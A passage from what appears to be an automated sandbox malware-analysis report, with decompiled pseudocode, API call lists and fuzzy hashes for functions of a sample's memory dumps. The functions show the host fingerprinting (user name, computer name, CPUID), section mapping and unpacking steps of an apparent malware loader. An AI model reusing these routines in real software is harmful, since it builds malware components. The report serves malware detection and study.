                                                                                                                                  				intOrPtr _t15;
                                                                                                                                  				long _t18;
                                                                                                                                  				void* _t19;
                                                                                                                                  				void* _t22;
                                                                                                                                  				intOrPtr _t31;
                                                                                                                                  				long _t32;
                                                                                                                                  				void* _t34;
                                                                                                                                  
                                                                                                                                  				_t31 = __edx;
                                                                                                                                  				_t14 =  &_v16;
                                                                                                                                  				GetSystemTimeAsFileTime(_t14);
                                                                                                                                  				_push(0x192);
                                                                                                                                  				_push(0x54d38000);
                                                                                                                                  				_push(_v12);
                                                                                                                                  				_push(_v16);
                                                                                                                                  				L6E8D2160();
                                                                                                                                  				_push(_t14);
                                                                                                                                  				_v16 = _t14;
                                                                                                                                  				_t15 =  *0x6e8d41c4;
                                                                                                                                  				_push(_t15 + 0x6e8d505e);
                                                                                                                                  				_push(_t15 + 0x6e8d5054);
                                                                                                                                  				_push(0x16);
                                                                                                                                  				_push( &_v60);
                                                                                                                                  				_v12 = _t31;
                                                                                                                                  				L6E8D215A();
                                                                                                                                  				_t18 = _a4;
                                                                                                                                  				if(_t18 == 0) {
                                                                                                                                  					_t18 = 0x1000;
                                                                                                                                  				}
                                                                                                                                  				_t19 = CreateFileMappingW(0xffffffff, 0x6e8d41c8, 4, 0, _t18,  &_v60); // executed
                                                                                                                                  				_t34 = _t19;
                                                                                                                                  				if(_t34 == 0) {
                                                                                                                                  					_t32 = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                  							_t32 = GetLastError();
                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                  								goto L9;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							 *_a8 = _t34;
                                                                                                                                  							 *_a12 = _t22;
                                                                                                                                  							_t32 = 0;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t32 = 2;
                                                                                                                                  						L9:
                                                                                                                                  						CloseHandle(_t34);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t32;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?,?), ref: 6E8D117F
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E8D1195
                                                                                                                                  • _snwprintf.NTDLL ref: 6E8D11BA
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,6E8D41C8,00000004,00000000,?,?), ref: 6E8D11DF
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?), ref: 6E8D11F6
                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E8D120A
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?), ref: 6E8D1222
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A), ref: 6E8D122B
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E8D1132,0000000A,?), ref: 6E8D1233
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID: @Mt MtTt$`RtAt
                                                                                                                                  • API String ID: 1724014008-3198888170
                                                                                                                                  • Opcode ID: 78df8c3f93e4b51cd015b3dd1fea98cd279ba8481b522931ca3ca1b6470c5620
                                                                                                                                  • Instruction ID: 7ba986f6b18fc5991479db6a19728f6eebf778330c13a8fb5fd8057c19e9836b
                                                                                                                                  • Opcode Fuzzy Hash: 78df8c3f93e4b51cd015b3dd1fea98cd279ba8481b522931ca3ca1b6470c5620
                                                                                                                                  • Instruction Fuzzy Hash: 44216DB264010CAFDB00EFE8CC88E9E77B9EB49355F114529F615E7180D6719D098BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E6E8D15C6(char _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v36;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t25;
                                                                                                                                  				long _t27;
                                                                                                                                  				long _t28;
                                                                                                                                  				long _t32;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr _t40;
                                                                                                                                  				signed int _t44;
                                                                                                                                  				signed int _t45;
                                                                                                                                  				long _t50;
                                                                                                                                  				intOrPtr _t52;
                                                                                                                                  				signed int _t53;
                                                                                                                                  				void* _t57;
                                                                                                                                  				void* _t60;
                                                                                                                                  				signed int _t62;
                                                                                                                                  				signed int _t63;
                                                                                                                                  				void* _t67;
                                                                                                                                  				intOrPtr* _t68;
                                                                                                                                  
                                                                                                                                  				_t25 = E6E8D1825();
                                                                                                                                  				_v8 = _t25;
                                                                                                                                  				if(_t25 != 0) {
                                                                                                                                  					return _t25;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					_t62 = 0;
                                                                                                                                  					_v12 = 0;
                                                                                                                                  					_t50 = 0x30;
                                                                                                                                  					do {
                                                                                                                                  						_t57 = E6E8D1000(_t50);
                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                  							_v8 = 8;
                                                                                                                                  						} else {
                                                                                                                                  							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                                                                                                                                  							_t53 = _t44;
                                                                                                                                  							_t45 = _t44 & 0x0000ffff;
                                                                                                                                  							_v8 = _t45;
                                                                                                                                  							if(_t45 == 4) {
                                                                                                                                  								_t50 = _t50 + 0x30;
                                                                                                                                  							}
                                                                                                                                  							_t63 = 0x13;
                                                                                                                                  							_t10 = _t53 + 1; // 0x1
                                                                                                                                  							_t62 =  *_t57 % _t63 + _t10;
                                                                                                                                  							E6E8D1397(_t57);
                                                                                                                                  						}
                                                                                                                                  					} while (_v8 != 0);
                                                                                                                                  					_t27 = E6E8D189E(_t57, _t62); // executed
                                                                                                                                  					_v8 = _t27;
                                                                                                                                  					Sleep(_t62 << 4); // executed
                                                                                                                                  					_t28 = _v8;
                                                                                                                                  				} while (_t28 == 9);
                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                  					L25:
                                                                                                                                  					return _t28;
                                                                                                                                  				}
                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                  					L18:
                                                                                                                                  					_push(0);
                                                                                                                                  					_t67 = E6E8D153C(E6E8D10B9,  &_v36);
                                                                                                                                  					if(_t67 == 0) {
                                                                                                                                  						_v8 = GetLastError();
                                                                                                                                  					} else {
                                                                                                                                  						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                                                                                                                  						_v8 = _t32;
                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                  							GetExitCodeThread(_t67,  &_v8);
                                                                                                                                  						}
                                                                                                                                  						CloseHandle(_t67);
                                                                                                                                  					}
                                                                                                                                  					_t28 = _v8;
                                                                                                                                  					if(_t28 == 0xffffffff) {
                                                                                                                                  						_t28 = GetLastError();
                                                                                                                                  					}
                                                                                                                                  					goto L25;
                                                                                                                                  				}
                                                                                                                                  				if(E6E8D1AD7(_t53,  &_a4) != 0) {
                                                                                                                                  					 *0x6e8d41b8 = 0;
                                                                                                                                  					goto L18;
                                                                                                                                  				}
                                                                                                                                  				_t52 = _a4;
                                                                                                                                  				_t68 = __imp__GetLongPathNameW;
                                                                                                                                  				_t38 =  *_t68(_t52, 0, 0); // executed
                                                                                                                                  				_t60 = _t38;
                                                                                                                                  				if(_t60 == 0) {
                                                                                                                                  					L16:
                                                                                                                                  					 *0x6e8d41b8 = _t52;
                                                                                                                                  					goto L18;
                                                                                                                                  				}
                                                                                                                                  				_t19 = _t60 + 2; // 0x2
                                                                                                                                  				_t40 = E6E8D1000(_t60 + _t19);
                                                                                                                                  				 *0x6e8d41b8 = _t40;
                                                                                                                                  				if(_t40 == 0) {
                                                                                                                                  					goto L16;
                                                                                                                                  				}
                                                                                                                                  				 *_t68(_t52, _t40, _t60); // executed
                                                                                                                                  				E6E8D1397(_t52);
                                                                                                                                  				goto L18;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D1825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E8D15D1), ref: 6E8D1834
                                                                                                                                    • Part of subcall function 6E8D1825: GetVersion.KERNEL32 ref: 6E8D1843
                                                                                                                                    • Part of subcall function 6E8D1825: GetCurrentProcessId.KERNEL32 ref: 6E8D185F
                                                                                                                                    • Part of subcall function 6E8D1825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E8D1878
                                                                                                                                    • Part of subcall function 6E8D1000: HeapAlloc.KERNEL32(00000000,?,6E8D15ED,00000030,74E063F0,00000000), ref: 6E8D100C
                                                                                                                                  • NtQuerySystemInformation.NTDLL ref: 6E8D15FB
                                                                                                                                  • Sleep.KERNELBASE(00000000,00000000,00000030,74E063F0,00000000), ref: 6E8D1642
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E8D1678
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E8D1696
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,6E8D10B9,?,00000000), ref: 6E8D16CD
                                                                                                                                  • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 6E8D16DF
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6E8D16E6
                                                                                                                                  • GetLastError.KERNEL32(6E8D10B9,?,00000000), ref: 6E8D16EE
                                                                                                                                  • GetLastError.KERNEL32 ref: 6E8D16FB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 3479304935-608512568
                                                                                                                                  • Opcode ID: ff99d3632a3fba676e50edeb260779ec24e88f68ea4aeea8c0cc2d9f4deb201a
                                                                                                                                  • Instruction ID: 57fe33498bd33d7167f06088e9fc718eeed136ff249199c027b249233d374f0f
                                                                                                                                  • Opcode Fuzzy Hash: ff99d3632a3fba676e50edeb260779ec24e88f68ea4aeea8c0cc2d9f4deb201a
                                                                                                                                  • Instruction Fuzzy Hash: 3831E071D00619ABDB50DBE99C44A9F7ABCEF46764F144922E404E3180EB30CE4CCBE0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E00A3A82B(char __eax, void* __esi) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				long _t34;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				long _t50;
                                                                                                                                  				char _t59;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				void* _t62;
                                                                                                                                  				void* _t64;
                                                                                                                                  				char _t65;
                                                                                                                                  				intOrPtr* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t69 = __esi;
                                                                                                                                  				_t65 = __eax;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = __eax;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t59 =  *0xa3d2a8; // 0xd448b889
                                                                                                                                  					_v12 = _t59;
                                                                                                                                  				}
                                                                                                                                  				_t64 = _t69;
                                                                                                                                  				E00A360B6( &_v12, _t64);
                                                                                                                                  				if(_t65 != 0) {
                                                                                                                                  					 *_t69 =  *_t69 ^  *0xa3d2dc ^ 0x46d76429;
                                                                                                                                  				} else {
                                                                                                                                  					GetUserNameW(0,  &_v8); // executed
                                                                                                                                  					_t50 = _v8;
                                                                                                                                  					if(_t50 != 0) {
                                                                                                                                  						_t62 = RtlAllocateHeap( *0xa3d270, 0, _t50 + _t50);
                                                                                                                                  						if(_t62 != 0) {
                                                                                                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                  								_t64 = _t62;
                                                                                                                                  								 *_t69 =  *_t69 ^ E00A3789B(_v8 + _v8, _t64);
                                                                                                                                  							}
                                                                                                                                  							HeapFree( *0xa3d270, 0, _t62);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t61 = __imp__;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				GetComputerNameW(0,  &_v8);
                                                                                                                                  				_t34 = _v8;
                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                  					_t68 = RtlAllocateHeap( *0xa3d270, 0, _t34 + _t34);
                                                                                                                                  					if(_t68 != 0) {
                                                                                                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                  							_t64 = _t68;
                                                                                                                                  							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00A3789B(_v8 + _v8, _t64);
                                                                                                                                  						}
                                                                                                                                  						HeapFree( *0xa3d270, 0, _t68);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				asm("cpuid");
                                                                                                                                  				_t67 =  &_v28;
                                                                                                                                  				 *_t67 = 1;
                                                                                                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                  				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                  				 *(_t67 + 0xc) = _t64;
                                                                                                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                  				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                  				return _t39;
                                                                                                                                  			}




















                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00A3A862
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A3A879
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00A3A886
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A3538B), ref: 00A3A8A7
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A3A8CE
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A3A8E2
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A3A8EF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A3538B), ref: 00A3A90D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3239747167-8415677
                                                                                                                                  • Opcode ID: 69427bb5ba356ecdc30dbbe87c1744846a578a071353badfe372911104b21090
                                                                                                                                  • Instruction ID: 97fdc650158b49a717cfddfa2d6db13aa77a0698258981b06b21b1d563238368
                                                                                                                                  • Opcode Fuzzy Hash: 69427bb5ba356ecdc30dbbe87c1744846a578a071353badfe372911104b21090
                                                                                                                                  • Instruction Fuzzy Hash: EE31D8B2A00205EFDB24DFA9DD81AAEB7F9AF58310F118469F545E3211DB30DE129B11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6E97DA28), ref: 6E97E097
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E97DA88), ref: 6E97E0CE
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E97E12E
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E164
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00000000,00000004,6E97DFB9), ref: 6E97E269
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00001000,00000004,6E97DFB9), ref: 6E97E290
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9), ref: 6E97E35D
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9,?), ref: 6E97E3B3
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E3CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682810308.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                  • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction ID: 1532731c19047ecb8d8048b55b1c182ca6af44890a261f2af2e2ca0a8a368f86
                                                                                                                                  • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                                  • Instruction Fuzzy Hash: 4FD17C725206219FDB22CF54CC80A9237E7FF49B91F0841A8ED4A9F34AD370AA05CF64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                  			E00A35D10(char _a4, void* _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				char _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				char _v36;
                                                                                                                                  				char _v40;
                                                                                                                                  				void* _v44;
                                                                                                                                  				void** _t33;
                                                                                                                                  				void* _t40;
                                                                                                                                  				void* _t43;
                                                                                                                                  				void** _t44;
                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                  				char _t48;
                                                                                                                                  
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v20 = _a4;
                                                                                                                                  				_t48 = 0;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_a4 = 0;
                                                                                                                                  				_v44 = 0x18;
                                                                                                                                  				_v40 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v36 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v24 = 0;
                                                                                                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                  					_t33 =  &_v8;
                                                                                                                                  					__imp__(_v12, 8, _t33);
                                                                                                                                  					if(_t33 >= 0) {
                                                                                                                                  						_t47 = __imp__;
                                                                                                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                  						_t44 = E00A375F6(_a4);
                                                                                                                                  						if(_t44 != 0) {
                                                                                                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                  							if(_t40 >= 0) {
                                                                                                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                  								_t48 = 1;
                                                                                                                                  							}
                                                                                                                                  							E00A34AAB(_t44);
                                                                                                                                  						}
                                                                                                                                  						NtClose(_v8); // executed
                                                                                                                                  					}
                                                                                                                                  					NtClose(_v12);
                                                                                                                                  				}
                                                                                                                                  				return _t48;
                                                                                                                                  			}




















                                                                                                                                  APIs
                                                                                                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A35D57
                                                                                                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00A35D6A
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A35D86
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A35DA3
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A35DB0
                                                                                                                                  • NtClose.NTDLL(?), ref: 00A35DC2
                                                                                                                                  • NtClose.NTDLL(00000000), ref: 00A35DCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2575439697-0
                                                                                                                                  • Opcode ID: 1fdf1d80f0ad875da5ed523dae32c1f8528dadb31d5542790ef937137cbc15d9
                                                                                                                                  • Instruction ID: 1af93d6c5599cf6269e6bf1a2ce28c6d7c4b7c12964806b457c3c5a8b4484432
                                                                                                                                  • Opcode Fuzzy Hash: 1fdf1d80f0ad875da5ed523dae32c1f8528dadb31d5542790ef937137cbc15d9
                                                                                                                                  • Instruction Fuzzy Hash: 3F21F5B6900218BBDB01DFA5DD45EDEBFBDEF08790F104126FA01F6121E7719A459BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E8E5696
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97B7A0,000008BB), ref: 6E8E576F
                                                                                                                                    • Part of subcall function 6E8E72B0: task.LIBCPMTD ref: 6E8E7352
                                                                                                                                    • Part of subcall function 6E8EBA20: swap.LIBCPMTD ref: 6E8EBA39
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E967144,?,?,?,?,?,00000000), ref: 6E8E5950
                                                                                                                                  • std::locale::locale.LIBCPMTD ref: 6E8E59D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 756721536-1684325040
                                                                                                                                  • Opcode ID: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction ID: 4548c44c63027359671f4cf293aaa57d58b060eb914cd35c51bf336499526202
                                                                                                                                  • Opcode Fuzzy Hash: 4523ba4582d832fb38a7824027b2ac74240894e4a52113d9145a3a0acb66f331
                                                                                                                                  • Instruction Fuzzy Hash: 7F524EF0A08624CFCF08CFA9D990AA977B6FF8B305F108929D54597794D7B8984DCB44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E6E8D13B8(intOrPtr* __eax, void** _a4) {
                                                                                                                                  				int _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				int _v28;
                                                                                                                                  				int _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				int _v40;
                                                                                                                                  				int _v44;
                                                                                                                                  				void* _v48;
                                                                                                                                  				void* __esi;
                                                                                                                                  				long _t34;
                                                                                                                                  				void* _t39;
                                                                                                                                  				void* _t47;
                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                  
                                                                                                                                  				_t48 = __eax;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_v48 = 0x18;
                                                                                                                                  				_v44 = 0;
                                                                                                                                  				_v36 = 0x40;
                                                                                                                                  				_v40 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                  				if(_t34 < 0) {
                                                                                                                                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                  				} else {
                                                                                                                                  					 *_t48 = _v16;
                                                                                                                                  					_t39 = E6E8D1273(_t48,  &_v12); // executed
                                                                                                                                  					_t47 = _t39;
                                                                                                                                  					if(_t47 != 0) {
                                                                                                                                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                  					} else {
                                                                                                                                  						memset(_v12, 0, _v24);
                                                                                                                                  						 *_a4 = _v12;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t47;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 6E8D1415
                                                                                                                                    • Part of subcall function 6E8D1273: NtMapViewOfSection.NTDLL(00000000,000000FF,6E8D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E8D142A,?), ref: 6E8D12A0
                                                                                                                                  • memset.NTDLL ref: 6E8D1437
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Section$CreateViewmemset
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2533685722-2766056989
                                                                                                                                  • Opcode ID: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                                  • Instruction ID: 2272e3e92d4f3fd131c8ba9fe8df28148912dcb4862802d22405b4accff3489a
                                                                                                                                  • Opcode Fuzzy Hash: c61638305c421a85b3a3431d95797393ed2746fec166c54830a0c940b8607d89
                                                                                                                                  • Instruction Fuzzy Hash: BD210EB5D00209AFDB01CFE9C8849DEFBBAEF48354F108929E655F3210D7359A488BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D1DE5(void* __edi, intOrPtr _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				intOrPtr* _v12;
                                                                                                                                  				_Unknown_base(*)()** _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed short _v24;
                                                                                                                                  				struct HINSTANCE__* _v28;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				struct HINSTANCE__* _t47;
                                                                                                                                  				intOrPtr* _t49;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				signed short _t51;
